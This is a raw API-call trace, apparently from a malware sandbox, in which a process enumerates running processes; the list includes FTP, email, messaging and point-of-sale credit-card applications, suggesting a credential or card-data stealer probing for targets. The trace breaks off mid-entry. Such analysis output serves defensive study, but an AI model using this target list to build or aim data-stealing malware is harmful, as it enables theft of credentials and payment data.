[0263.850] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0263.851] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0263.852] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0263.854] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0263.858] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0263.860] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0263.861] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0263.863] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0263.864] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0263.866] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0263.867] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0263.869] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x838, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0263.870] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0263.979] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0263.982] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="studentbecausedemocratic.exe")) returned 1 [0263.984] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="share.exe")) returned 1 [0263.986] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="myself.exe")) returned 1 [0263.988] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="feel.exe")) returned 1 [0263.990] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="action program citizen.exe")) returned 1 [0263.992] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="reachinvolve.exe")) returned 1 [0263.994] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="question.exe")) returned 1 [0264.011] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="play hit.exe")) returned 1 [0264.014] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mean.exe")) returned 1 [0264.016] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xde0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="evening.exe")) returned 1 [0264.018] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="memory everybody nature.exe")) returned 1 [0264.020] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="structurecausebar.exe")) returned 1 [0264.022] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="good.exe")) returned 1 [0264.024] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="item study safe.exe")) returned 1 [0264.026] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="health-prove-opportunity.exe")) returned 1 [0264.091] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="break.exe")) returned 1 [0264.094] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="minute-budget-themselves.exe")) returned 1 [0264.096] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0264.098] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0264.100] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0264.101] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0264.103] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0264.109] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0264.110] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0264.112] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xea0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0264.114] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0264.117] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0264.119] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0264.124] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0264.127] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0264.129] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xee4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0264.131] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xef8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0264.133] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0264.135] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0264.193] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0264.195] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0264.196] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0264.198] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0264.203] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0264.206] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0264.208] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0264.210] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0264.212] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0264.214] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0264.267] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0264.270] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0264.272] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0264.274] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0264.276] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0264.304] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0264.306] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0264.308] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0264.310] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0264.313] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x594, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0264.315] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0264.317] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0264.319] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0264.321] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x100c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0264.323] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1018, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0264.325] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1028, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0264.327] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1034, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="likely-final-out.exe")) returned 1 [0264.328] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="local reality bank.exe")) returned 1 [0264.330] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="kitchen-box-instead.exe")) returned 1 [0264.332] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1058, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x9dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0264.334] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0264.336] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x127c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0264.338] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0264.389] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0264.391] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, 